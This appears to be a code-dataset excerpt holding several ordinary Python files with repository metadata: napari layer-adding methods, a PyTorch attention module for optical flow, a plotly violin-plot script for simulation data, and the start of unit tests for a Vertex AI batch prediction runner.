layer : :class:`napari.layers.Surface`
The newly-created surface layer.
"""
layer = layers.Surface(
data,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_vectors(
self,
data,
*,
edge_width=1,
edge_color='red',
length=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
"""Add a vectors layer to the layers list.
Parameters
----------
data : (N, 2, D) or (N1, N2, ..., ND, D) array
An (N, 2, D) array is interpreted as "coordinate-like" data and a
list of N vectors with start point and projections of the vector in
D dimensions. An (N1, N2, ..., ND, D) array is interpreted as
"image-like" data where there is a length D vector of the
projections at each pixel.
edge_width : float
Width for all vectors in pixels.
length : float
Multiplicative factor on projections for length of all vectors.
edge_color : str
Edge color of all the vectors.
name : str
Name of the layer.
metadata : dict
Layer metadata.
scale : tuple of float
Scale factors for the layer.
translate : tuple of float
Translation values for the layer.
opacity : float
Opacity of the layer visual, between 0.0 and 1.0.
blending : str
One of a list of preset blending modes that determines how RGB and
alpha values of the layer visual get mixed. Allowed values are
{'opaque', 'translucent', and 'additive'}.
visible : bool
Whether the layer visual is currently being displayed.
Returns
-------
layer : :class:`napari.layers.Vectors`
The newly-created vectors layer.
"""
layer = layers.Vectors(
data,
edge_width=edge_width,
edge_color=edge_color,
length=length,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def _add_layer_from_data(
self, data, meta: dict = None, layer_type: str = 'image'
):
"""Add arbitrary layer data to the viewer.
Primarily intended for usage by reader plugin hooks.
Parameters
----------
data : Any
Data in a format that is valid for the corresponding `add_*` method
of the specified ``layer_type``.
meta : dict, optional
Dict of keyword arguments that will be passed to the corresponding
`add_*` method. MUST NOT contain any keyword arguments that are
not valid for the corresponding method.
layer_type : str
Type of layer to add. MUST have a corresponding add_* method on
on the viewer instance.
Raises
------
ValueError
If ``layer_type`` is not one of the recognized layer types.
TypeError
If any keyword arguments in ``meta`` are unexpected for the
corresponding `add_*` method for this layer_type.
Examples
--------
A typical use case might be to upack a tuple of layer data with a
specified layer_type.
>>> viewer = napari.Viewer()
>>> data = (
... np.random.random((10, 2)) * 20,
... {'face_color': 'blue'},
... 'points',
... )
>>> viewer._add_layer_from_data(*data)
"""
layer_type = layer_type.lower()
if layer_type not in layers.NAMES:
raise ValueError(
f"Unrecognized layer_type: '{layer_type}'. "
f"Must be one of: {layers.NAMES}."
)
try:
add_method = getattr(self, 'add_' + layer_type)
except AttributeError:
raise NotImplementedError(
f"Sorry! {layer_type} is a valid layer type, but there is no "
f"viewer.add_{layer_type} available yet."
)
try:
add_method(data, **(meta or {}))
except TypeError as exc:
if 'unexpected keyword argument' in str(exc):
bad_key = str(exc).split('keyword argument ')[-1]
raise TypeError(
"_add_layer_from_data received an unexpected keyword "
f"argument ({bad_key}) for layer type {layer_type}"
) from exc
| 37.86911 | 91 | 0.572515 | import itertools
import numpy as np
from .. import layers
from ..utils import colormaps
from ..utils.misc import ensure_iterable, is_iterable
from ..utils import io
class AddLayersMixin:
def add_layer(self, layer):
layer.events.select.connect(self._update_active_layer)
layer.events.deselect.connect(self._update_active_layer)
layer.events.status.connect(self._update_status)
layer.events.help.connect(self._update_help)
layer.events.interactive.connect(self._update_interactive)
layer.events.cursor.connect(self._update_cursor)
layer.events.cursor_size.connect(self._update_cursor_size)
layer.events.data.connect(self._on_layers_change)
layer.dims.events.ndisplay.connect(self._on_layers_change)
layer.dims.events.order.connect(self._on_layers_change)
layer.dims.events.range.connect(self._on_layers_change)
self.layers.append(layer)
self._update_layers(layers=[layer])
if len(self.layers) == 1:
self.reset_view()
def add_image(
self,
data=None,
*,
channel_axis=None,
rgb=None,
is_pyramid=None,
colormap=None,
contrast_limits=None,
gamma=1,
interpolation='nearest',
rendering='mip',
iso_threshold=0.5,
attenuation=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending=None,
visible=True,
path=None,
):
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
if channel_axis is None:
if colormap is None:
colormap = 'gray'
if blending is None:
blending = 'translucent'
layer = layers.Image(
data,
rgb=rgb,
is_pyramid=is_pyramid,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
interpolation=interpolation,
rendering=rendering,
iso_threshold=iso_threshold,
attenuation=attenuation,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
else:
if is_pyramid:
n_channels = data[0].shape[channel_axis]
else:
n_channels = data.shape[channel_axis]
name = ensure_iterable(name)
if blending is None:
blending = 'additive'
if colormap is None:
if n_channels < 3:
colormap = colormaps.MAGENTA_GREEN
else:
colormap = itertools.cycle(colormaps.CYMRGB)
else:
colormap = ensure_iterable(colormap)
if contrast_limits is not None and not is_iterable(
contrast_limits[0]
):
contrast_limits = itertools.repeat(contrast_limits)
else:
contrast_limits = ensure_iterable(contrast_limits)
gamma = ensure_iterable(gamma)
layer_list = []
zipped_args = zip(
range(n_channels), colormap, contrast_limits, gamma, name
)
for i, cmap, clims, _gamma, name in zipped_args:
if is_pyramid:
image = [
np.take(data[j], i, axis=channel_axis)
for j in range(len(data))
]
else:
image = np.take(data, i, axis=channel_axis)
layer = layers.Image(
image,
rgb=rgb,
colormap=cmap,
contrast_limits=clims,
gamma=_gamma,
interpolation=interpolation,
rendering=rendering,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
layer_list.append(layer)
return layer_list
def add_points(
self,
data=None,
*,
properties=None,
symbol='o',
size=10,
edge_width=1,
edge_color='black',
edge_color_cycle=None,
edge_colormap='viridis',
edge_contrast_limits=None,
face_color='white',
face_color_cycle=None,
face_colormap='viridis',
face_contrast_limits=None,
n_dimensional=False,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty([0, ndim])
layer = layers.Points(
data=data,
properties=properties,
symbol=symbol,
size=size,
edge_width=edge_width,
edge_color=edge_color,
edge_color_cycle=edge_color_cycle,
edge_colormap=edge_colormap,
edge_contrast_limits=edge_contrast_limits,
face_color=face_color,
face_color_cycle=face_color_cycle,
face_colormap=face_colormap,
face_contrast_limits=face_contrast_limits,
n_dimensional=n_dimensional,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_labels(
self,
data=None,
*,
is_pyramid=None,
num_colors=50,
seed=0.5,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
path=None,
):
if data is None and path is None:
raise ValueError("One of either data or path must be provided")
elif data is not None and path is not None:
raise ValueError("Only one of data or path can be provided")
elif data is None:
data = io.magic_imread(path)
layer = layers.Labels(
data,
is_pyramid=is_pyramid,
num_colors=num_colors,
seed=seed,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_shapes(
self,
data=None,
*,
shape_type='rectangle',
edge_width=1,
edge_color='black',
face_color='white',
z_index=0,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
if data is None:
ndim = max(self.dims.ndim, 2)
data = np.empty((0, 0, ndim))
layer = layers.Shapes(
data=data,
shape_type=shape_type,
edge_width=edge_width,
edge_color=edge_color,
face_color=face_color,
z_index=z_index,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_surface(
self,
data,
*,
colormap='gray',
contrast_limits=None,
gamma=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=1,
blending='translucent',
visible=True,
):
layer = layers.Surface(
data,
colormap=colormap,
contrast_limits=contrast_limits,
gamma=gamma,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def add_vectors(
self,
data,
*,
edge_width=1,
edge_color='red',
length=1,
name=None,
metadata=None,
scale=None,
translate=None,
opacity=0.7,
blending='translucent',
visible=True,
):
layer = layers.Vectors(
data,
edge_width=edge_width,
edge_color=edge_color,
length=length,
name=name,
metadata=metadata,
scale=scale,
translate=translate,
opacity=opacity,
blending=blending,
visible=visible,
)
self.add_layer(layer)
return layer
def _add_layer_from_data(
self, data, meta: dict = None, layer_type: str = 'image'
):
layer_type = layer_type.lower()
if layer_type not in layers.NAMES:
raise ValueError(
f"Unrecognized layer_type: '{layer_type}'. "
f"Must be one of: {layers.NAMES}."
)
try:
add_method = getattr(self, 'add_' + layer_type)
except AttributeError:
raise NotImplementedError(
f"Sorry! {layer_type} is a valid layer type, but there is no "
f"viewer.add_{layer_type} available yet."
)
try:
add_method(data, **(meta or {}))
except TypeError as exc:
if 'unexpected keyword argument' in str(exc):
bad_key = str(exc).split('keyword argument ')[-1]
raise TypeError(
"_add_layer_from_data received an unexpected keyword "
f"argument ({bad_key}) for layer type {layer_type}"
) from exc
| true | true |
f7235fc664c9234fd731422b0aaf6fa17bccc2fc | 5,410 | py | Python | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | 2 | 2022-03-14T04:35:26.000Z | 2022-03-25T12:33:47.000Z | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | null | null | null | core/gma.py | askerlee/craft | 921a47a4e81017e5baf49c2823958cf86a0c1fc2 | [
"WTFPL"
] | null | null | null | import torch
from torch import nn, einsum
from einops import rearrange
# max_pos_size = 160
class RelPosEmb(nn.Module):
def __init__(
self,
max_pos_size,
dim_head
):
super().__init__()
self.rel_height = nn.Embedding(2 * max_pos_size - 1, dim_head)
self.rel_width = nn.Embedding(2 * max_pos_size - 1, dim_head)
deltas = torch.arange(max_pos_size).view(1, -1) - torch.arange(max_pos_size).view(-1, 1)
# rel_ind[i, j] = j - i + 159.
rel_ind = deltas + max_pos_size - 1
self.register_buffer('rel_ind', rel_ind)
def forward(self, q):
# q: [8, 1, 46, 62, 128]
batch, heads, h, w, c = q.shape
# self.rel_ind[:h, :h]: [46, 46]
# self.rel_ind[:w, :w]: [62, 62]
# rel_ind[i,j] = j - i + 159, precomputed distance between i, j.
# This assumes the input x (from which q is derived) is precisely on the grid.
# This is fine when we do self-attention on x.
# However, it will be somewhat limiting if we use RelPosEmb on cross-attention between two frames,
# particularly when we use flow_init != 0 (on sintel),
# we better get the positional encodings of x according to flow_init, instead of the grid of x.
# However, an accurate computation of the relative distances between all input units is expensive.
# Since values in flow_init are usually small, this inaccuracy may be negligible.
height_emb = self.rel_height(self.rel_ind[:h, :h].reshape(-1))
width_emb = self.rel_width( self.rel_ind[:w, :w].reshape(-1))
# height_emb: [46*46, 128] => [46, 46, 1, 128]
# width_emb: [62*62, 128] => [62, 1, 62, 128]
# height_emb[i, j]: the embedding of element at (i,j) as a function of the height difference (i-j).
# width_emb[i, j]: the embedding of element at (i,j) as a function of the width difference (i-j).
height_emb = rearrange(height_emb, '(x u) d -> x u () d', x=h)
width_emb = rearrange(width_emb, '(y v) d -> y () v d', y=w)
# outer product? y, uv -> y u v b h x y d x u v d
# height_score: [8, 1, 46, 62, 46, 1] <= [8, 1, 46, 62, 128] * [46, 46, 1, 128]
# width_score: [8, 1, 46, 62, 1, 62]
height_score = einsum('b h x y d, x u v d -> b h x y u v', q, height_emb)
width_score = einsum('b h x y d, y u v d -> b h x y u v', q, width_emb)
# height_score + width_score: [8, 1, 46, 62, 46, 62], 65071232 elements.
return height_score + width_score
class Attention(nn.Module):
    """2D self-attention over a feature map, returning the attention matrix.

    Depending on the flags carried by ``args``, the similarity is computed
    from positions only, from content only, or from a weighted sum of both.
    """

    def __init__(
        self,
        *,
        args,
        dim,
        max_pos_size = 100,
        heads = 4,
        dim_head = 128,
    ):
        super().__init__()
        self.args = args
        self.heads = heads
        # 1/sqrt(d) scaling, applied to the queries before the dot product.
        self.scale = dim_head ** -0.5

        # A single 1x1 conv projects the feature map to queries and keys.
        self.to_qk = nn.Conv2d(dim, heads * dim_head * 2, 1, bias=False)
        self.pos_emb = RelPosEmb(max_pos_size, dim_head)
        self.pos_embed_weight = 1.0

    def forward(self, fmap):
        num_heads = self.heads
        b, c, h, w = fmap.shape

        # Split the joint projection into queries and keys: [b, h*d, x, y] each.
        query, key = self.to_qk(fmap).chunk(2, dim=1)
        query = rearrange(query, 'b (h d) x y -> b h x y d', h=num_heads)
        key = rearrange(key, 'b (h d) x y -> b h x y d', h=num_heads)
        # Only the queries are scaled (scaling both would double-count 1/sqrt(d)).
        query = query * self.scale

        if self.args.position_only:
            sim = self.pos_emb(query)
        elif self.args.position_and_content:
            content_score = einsum('b h x y d, b h u v d -> b h x y u v', query, key)
            position_score = self.pos_emb(query)
            sim = content_score + self.pos_embed_weight * position_score
        else:
            # Content-only similarity between every pair of spatial positions.
            sim = einsum('b h x y d, b h u v d -> b h x y u v', query, key)

        # Flatten the two spatial grids and normalise over the key positions.
        sim = rearrange(sim, 'b h x y u v -> b h (x y) (u v)')
        return sim.softmax(dim=-1)
# Aggregate output is dim-dimensional, same as the input. No FFN is used.
class Aggregate(nn.Module):
    """Aggregate a feature map's values with a precomputed attention matrix.

    The result is added back to the input through a learned, zero-initialised
    residual gate, so the module starts out as an identity mapping.
    """

    def __init__(
        self,
        args,
        dim,
        heads = 4,
        dim_head = 128,
    ):
        super().__init__()
        self.args = args
        self.heads = heads
        self.scale = dim_head ** -0.5
        inner = heads * dim_head

        self.to_v = nn.Conv2d(dim, inner, 1, bias=False)
        # Residual gate; zero init means the aggregation contributes nothing
        # until training moves gamma away from zero.
        self.gamma = nn.Parameter(torch.zeros(1))

        # Only project back to `dim` when the multi-head value width differs
        # (with the default heads=1-style configs used here it can be None).
        self.project = (
            nn.Conv2d(inner, dim, 1, bias=False) if dim != inner else None
        )

    def forward(self, attn, fmap):
        b, c, h, w = fmap.shape

        values = rearrange(self.to_v(fmap), 'b (h d) x y -> b h (x y) d', h=self.heads)
        # Weighted sum of values under the attention matrix.
        aggregated = einsum('b h i j, b h j d -> b h i d', attn, values)
        aggregated = rearrange(aggregated, 'b h (x y) d -> b (h d) x y', x=h, y=w)

        # project is None for GMA.
        if self.project is not None:
            aggregated = self.project(aggregated)

        return fmap + self.gamma * aggregated
if __name__ == "__main__":
    from types import SimpleNamespace

    # Smoke test of the content-only attention path.
    # BUGFIX: `args` is a required keyword-only argument of Attention, and
    # forward() reads args.position_only / args.position_and_content, so the
    # previous call `Attention(dim=128, heads=1)` raised a TypeError before
    # any attention was computed. Provide a minimal args object instead.
    test_args = SimpleNamespace(position_only=False, position_and_content=False)
    att = Attention(args=test_args, dim=128, heads=1)
    fmap = torch.randn(2, 128, 40, 90)
    out = att(fmap)
    print(out.shape)
| 35.827815 | 107 | 0.533272 | import torch
from torch import nn, einsum
from einops import rearrange
class RelPosEmb(nn.Module):
def __init__(
self,
max_pos_size,
dim_head
):
super().__init__()
self.rel_height = nn.Embedding(2 * max_pos_size - 1, dim_head)
self.rel_width = nn.Embedding(2 * max_pos_size - 1, dim_head)
deltas = torch.arange(max_pos_size).view(1, -1) - torch.arange(max_pos_size).view(-1, 1)
rel_ind = deltas + max_pos_size - 1
self.register_buffer('rel_ind', rel_ind)
def forward(self, q):
batch, heads, h, w, c = q.shape
height_emb = self.rel_height(self.rel_ind[:h, :h].reshape(-1))
width_emb = self.rel_width( self.rel_ind[:w, :w].reshape(-1))
height_emb = rearrange(height_emb, '(x u) d -> x u () d', x=h)
width_emb = rearrange(width_emb, '(y v) d -> y () v d', y=w)
height_score = einsum('b h x y d, x u v d -> b h x y u v', q, height_emb)
width_score = einsum('b h x y d, y u v d -> b h x y u v', q, width_emb)
return height_score + width_score
class Attention(nn.Module):
def __init__(
self,
*,
args,
dim,
max_pos_size = 100,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_qk = nn.Conv2d(dim, inner_dim * 2, 1, bias=False)
self.pos_emb = RelPosEmb(max_pos_size, dim_head)
self.pos_embed_weight = 1.0
def forward(self, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
q, k = self.to_qk(fmap).chunk(2, dim=1)
q, k = map(lambda t: rearrange(t, 'b (h d) x y -> b h x y d', h=heads), (q, k))
q = self.scale * q
if self.args.position_only:
sim = self.pos_emb(q)
elif self.args.position_and_content:
sim_content = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim_pos = self.pos_emb(q)
sim = sim_content + self.pos_embed_weight * sim_pos
else:
sim = einsum('b h x y d, b h u v d -> b h x y u v', q, k)
sim = rearrange(sim, 'b h x y u v -> b h (x y) (u v)')
attn = sim.softmax(dim=-1)
return attn
class Aggregate(nn.Module):
def __init__(
self,
args,
dim,
heads = 4,
dim_head = 128,
):
super().__init__()
self.args = args
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = heads * dim_head
self.to_v = nn.Conv2d(dim, inner_dim, 1, bias=False)
self.gamma = nn.Parameter(torch.zeros(1))
if dim != inner_dim:
self.project = nn.Conv2d(inner_dim, dim, 1, bias=False)
else:
self.project = None
def forward(self, attn, fmap):
heads, b, c, h, w = self.heads, *fmap.shape
v = self.to_v(fmap)
v = rearrange(v, 'b (h d) x y -> b h (x y) d', h=heads)
out = einsum('b h i j, b h j d -> b h i d', attn, v)
out = rearrange(out, 'b h (x y) d -> b (h d) x y', x=h, y=w)
if self.project is not None:
out = self.project(out)
out = fmap + self.gamma * out
return out
if __name__ == "__main__":
att = Attention(dim=128, heads=1)
fmap = torch.randn(2, 128, 40, 90)
out = att(fmap)
print(out.shape)
| true | true |
f72361b431087bf4ff87976c66774cf113aa3b6e | 7,023 | py | Python | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | null | null | null | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | null | null | null | data_analysis/during_day_data_analysis/EndOfDaySatisfactionDistribution.py | migbash/energy-intern-backend | 41b9d2acf5e8d30c8d8d55b006c33b97267dc497 | [
"MIT"
] | 3 | 2019-09-11T04:14:15.000Z | 2021-03-01T15:16:57.000Z | import ast
import csv
import inflect
import os
import plotly as py
import sys
from typing import Any, Dict, List
""" Takes pre-prepared data from the SimulationVisualiserInitiator class and produces a series of violin plots
comparing the satisfaction distributions of the different agent types at the end of a series of specified key days.
Data is averaged over all simulation runs.
Parameters
---------
folderName : str
The output destination folder, used to organise output data.
tag : str
A unique tag so that generated graphs can easily be associated with their corresponding data sets.
individualSatisfactions : str
The absolute path of the data set required for generating the violin plots showing the satisfaction distributions
for each agent type at the end of the key days.
totalDaysSimulated : int
The total number of days that have been simulated, determines graphs axis dimensions.
totalExchangesSimulated : int
The total number of exchanges that have been simulated, determines graphs axis dimensions.
daysToVisualise : str
The specific days that will have a line graph of the agent satisfactions at the end of each round throughout the
day generated. Note that this is immediately converted to type List[int].
"""
# CLI contract: argv[1..6] = output folder, run tag, data-file path,
# total simulated days, total simulated exchanges, and a Python-literal
# list of key days — in that order.
folderName: str = sys.argv[1]
# Unique identifier to identify which run the produced graphs are associated with.
tag: str = sys.argv[2]
# Absolute path of the per-agent satisfaction data set to visualise.
individualSatisfactions: str = sys.argv[3]
# Scope of the data to be visualised (iteration bounds / axis dimensions).
totalDaysSimulated: int = int(sys.argv[4])
totalExchangesSimulated: int = int(sys.argv[5])
# Specific days whose satisfaction distributions each get a violin plot.
# ast.literal_eval safely parses the "[1, 2, ...]" list literal from the CLI.
daysToVisualise: List[int] = ast.literal_eval(sys.argv[6])
# Used to get ordinal word versions of integers for graph titles.
# NOTE(review): this rebinds the imported `inflect` module name to an engine
# instance; all later uses rely on the instance, so the module itself is
# unreachable from this point on.
inflect = inflect.engine()
# Output directory: <root>/<folderName>/<tag>/images/DDDataAnalysis/EoDSD,
# where <root> is four directory levels above this file.
duringDayOutputDirectory: str = \
    os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))),
                 folderName
                 + '/'
                 + tag
                 + '/images/DDDataAnalysis/EoDSD')
# Create the output directory if it does not already exist.
if not os.path.exists(duringDayOutputDirectory):
    os.makedirs(duringDayOutputDirectory)
# Graph files reuse the data file's base name with a .pdf extension.
baseFileName: str = individualSatisfactions.split('/')[-1]
convertedBaseFileName: str = baseFileName.split('.')[0] + '.pdf'
# Store the scope of the data (one label per simulated day).
days: List[str] = []
fieldNames: List[str] = ["Selfish", "Social"]
for day in range(1, totalDaysSimulated + 1):
    days.append(str(day))
# Options for graph styling (one colour / dash style per agent type).
colours: List[str] = ['purple', 'green', 'red', 'blue']
lineTypes: List[str] = ['1px', 'solid', '15px', '5px']
# Violin plots show the distributions of individual satisfactions for individual agents
# at the end of key days; one split-violin graph is produced per key day.
with open(individualSatisfactions) as individualSatisfactionDeviations:
    reader = csv.reader(individualSatisfactionDeviations)

    # Each pre-selected day is visualised in its own graph.
    for i in range(len(daysToVisualise)):
        # Store calculated graph data.
        data: Any = []

        # Used to distinguish results when many agent types are present.
        # (The write-only lineType counter from the original was dropped.)
        colour: int = 0

        # Each agent type is plotted separately; the first type is drawn on
        # the negative (left) side of the split violin, later types on the
        # positive (right) side.
        firstType = True
        for j in range(len(fieldNames)):
            satisfactions: List[float] = []
            individualSatisfactionDeviations.seek(0)

            # The first line contains only headers and so can be skipped.
            next(reader)
            for row in reader:
                # Columns: day, agent type, satisfaction value.
                # The agent-type column uses j + 1 as types start at 1, not 0.
                if int(row[0]) == int(daysToVisualise[i]) \
                        and int(row[1]) == int(j + 1):
                    satisfactions.append(float(row[2]))

            # Add the agent type's data plot to the graph data.
            # The two original branches differed only in `side`; build the
            # shared Violin once instead of duplicating the constructor call.
            data.append(
                py.graph_objs.Violin(
                    y=satisfactions,
                    x0=' ',
                    width=1,
                    name=fieldNames[j],
                    side='negative' if firstType else 'positive',
                    line=dict(
                        color=colours[colour],
                    ),
                    meanline_visible=True,
                    scalemode='count',
                    spanmode='hard',
                    points=False,
                    showlegend=True,
                )
            )
            firstType = False
            colour += 1

        # The day value is converted into the ordinal word form for styling.
        day: str = inflect.number_to_words(inflect.ordinal(daysToVisualise[i]))

        # Style the graph layout.
        # BUGFIX: annotate with typing.Any (already imported and used above
        # for `data`); the builtin function `any` is not a type.
        layout: Any = dict(
            title=dict(
                text='Satisfaction deviation during the<br>' + day + ' day',
                xanchor='center',
                x=0.5,
            ),
            yaxis=dict(
                title='Average consumer satisfaction',
                showline=True,
                linecolor='black',
                linewidth=1,
                gridcolor='rgb(225, 225, 225)',
                gridwidth=1,
                range=[0, 1],
                tickmode='linear',
                tick0=0,
                dtick=0.2,
            ),
            xaxis=dict(
                showline=True,
                linecolor='black',
                linewidth=1,
            ),
            violinmode='overlay',
            violingap=0,
            paper_bgcolor='rgb(255, 255, 255)',
            plot_bgcolor='rgb(255, 255, 255)',
            font=dict(
                size=19
            ),
        )

        # Create the graph and save the file.
        fig: Dict[Any, Any] = dict(data=data, layout=layout)
        fileName: str = convertedBaseFileName.replace(
            '.pdf', '_day_' + str(daysToVisualise[i]) + '.pdf')
        fullPath: str = os.path.join(duringDayOutputDirectory, fileName)
        py.io.write_image(fig, fullPath)
| 37.15873 | 117 | 0.576249 | import ast
import csv
import inflect
import os
import plotly as py
import sys
from typing import Any, Dict, List
folderName: str = sys.argv[1]
tag: str = sys.argv[2]
individualSatisfactions: str = sys.argv[3]
totalDaysSimulated: int = int(sys.argv[4])
totalExchangesSimulated: int = int(sys.argv[5])
daysToVisualise: List[int] = ast.literal_eval(sys.argv[6])
inflect = inflect.engine()
duringDayOutputDirectory: str = \
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))),
folderName
+ '/'
+ tag
+ '/images/DDDataAnalysis/EoDSD')
if not os.path.exists(duringDayOutputDirectory):
os.makedirs(duringDayOutputDirectory)
baseFileName: str = individualSatisfactions.split('/')[-1]
convertedBaseFileName: str = baseFileName.split('.')[0] + '.pdf'
days: List[str] = []
fieldNames: List[str] = ["Selfish", "Social"]
for day in range(1, totalDaysSimulated + 1):
days.append(str(day))
colours: List[str] = ['purple', 'green', 'red', 'blue']
lineTypes: List[str] = ['1px', 'solid', '15px', '5px']
with open(individualSatisfactions) as individualSatisfactionDeviations:
reader = csv.reader(individualSatisfactionDeviations)
for i in range(len(daysToVisualise)):
data: Any = []
lineType: int = 0
colour: int = 0
firstType = True
for j in range(len(fieldNames)):
satisfactions: List[float] = []
individualSatisfactionDeviations.seek(0)
next(reader)
for row in reader:
if int(row[0]) == int(daysToVisualise[i]) \
and int(row[1]) == int(j + 1):
satisfactions.append(float(row[2]))
if firstType:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='negative',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
firstType = False
else:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='positive',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
lineType += 1
colour += 1
day: str = inflect.number_to_words(inflect.ordinal(daysToVisualise[i]))
layout: any = dict(
title=dict(
text='Satisfaction deviation during the<br>' + day + ' day',
xanchor='center',
x=0.5,
),
yaxis=dict(
title='Average consumer satisfaction',
showline=True,
linecolor='black',
linewidth=1,
gridcolor='rgb(225, 225, 225)',
gridwidth=1,
range=[0, 1],
tickmode='linear',
tick0=0,
dtick=0.2,
),
xaxis=dict(
showline=True,
linecolor='black',
linewidth=1,
),
violinmode='overlay',
violingap=0,
paper_bgcolor='rgb(255, 255, 255)',
plot_bgcolor='rgb(255, 255, 255)',
font=dict(
size=19
),
)
fig: Dict[any, any] = dict(data=data, layout=layout)
fileName: str = convertedBaseFileName.replace(
'.pdf', '_day_' + str(daysToVisualise[i]) + '.pdf')
fullPath: str = os.path.join(duringDayOutputDirectory, fileName)
py.io.write_image(fig, fullPath)
| true | true |
f723642fef0f256789399085397280f69683b86e | 8,895 | py | Python | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Vertex AI Batch Prediction Job Remote Runner Client module."""
import json
from logging import raiseExceptions
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
  """Unit tests for the batch prediction job remote runner launcher.

  Each test stubs out ``aiplatform.gapic.JobServiceClient`` and checks one
  aspect of ``create_batch_prediction_job``: client construction, payload
  deserialization, error propagation, state polling, and the
  ``gcp_resources`` output file.
  """

  def setUp(self):
    super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
    # Serialized BatchPredictionJob spec that the launcher is expected to
    # deserialize and forward verbatim to the JobService API.
    self._payload = (
        '{"batchPredictionJob": {"displayName": '
        '"BatchPredictionComponentName", "model": '
        '"projects/test/locations/test/models/test-model","inputConfig":'
        ' {"instancesFormat": "CSV","gcsSource": {"uris": '
        '["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
        '"CSV", "gcsDestination": {"outputUriPrefix": '
        '"test_gcs_destination"}}}}')
    self._job_type = 'BatchPredictionJob'
    self._project = 'test_project'
    self._location = 'test_region'
    # Bug fix: this literal was missing its f-prefix, so the
    # {self._project}/{self._location} placeholders were emitted verbatim
    # instead of being interpolated.
    self._batch_prediction_job_name = f'/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
    self._gcp_resources = 'gcp_resources'
    self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'

  def tearDown(self):
    # Remove the gcp_resources file a test run may have written.
    if os.path.exists(self._gcp_resources):
      os.remove(self._gcp_resources)

